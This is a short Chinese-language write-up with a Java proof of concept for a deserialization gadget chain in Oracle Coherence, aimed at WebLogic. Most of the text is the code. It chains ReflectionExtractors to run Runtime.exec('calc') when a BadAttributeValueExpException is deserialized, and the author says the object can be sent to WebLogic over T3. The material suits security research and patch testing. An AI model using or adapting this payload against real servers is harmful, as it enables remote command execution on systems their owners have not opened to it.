簡介
該反序列化的gadget存在與coherence包中。具體可以見分析
構造chain類似於common-collection的chain,可以照葫蘆畫瓢。
mvn 好像不能下載coherence包,很奇怪,直接下jar包就行。
反序列化的對象,通過t3發送給weblogic即可。所以,這個只是生成payload的工具。
poc
package org.example;
import com.tangosol.util.ValueExtractor;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import com.tangosol.util.filter.AlwaysFilter;
import com.tangosol.util.filter.LimitFilter;
import javax.management.BadAttributeValueExpException;
import java.io.*;
/*
Powered by UnicodeSec
*/
public class App
{
public static void main( String[] args ) throws IOException, ClassNotFoundException {
ValueExtractor[] poc = new ValueExtractor[]{
new ReflectionExtractor("getMethod", new Object[] {
"getRuntime", new Class[0] }),
new ReflectionExtractor("invoke", new Object[] {
null, new Object[0] }),
new ReflectionExtractor("exec", new String[]{"calc"})
};
ChainedExtractor chained = new ChainedExtractor(poc);
LimitFilter limit = new LimitFilter(new AlwaysFilter(), 1);
limit.setComparator(chained);
limit.setTopAnchor(Runtime.class);
BadAttributeValueExpException expException = new BadAttributeValueExpException(limit);
// 序列化測試
ByteArrayOutputStream bytes = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bytes);
oos.writeObject(expException);
oos.close();
//反序列化
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes.toByteArray()));
BadAttributeValueExpException newUser = (BadAttributeValueExpException)ois.readObject();
System.out.println(newUser.toString());
}
}
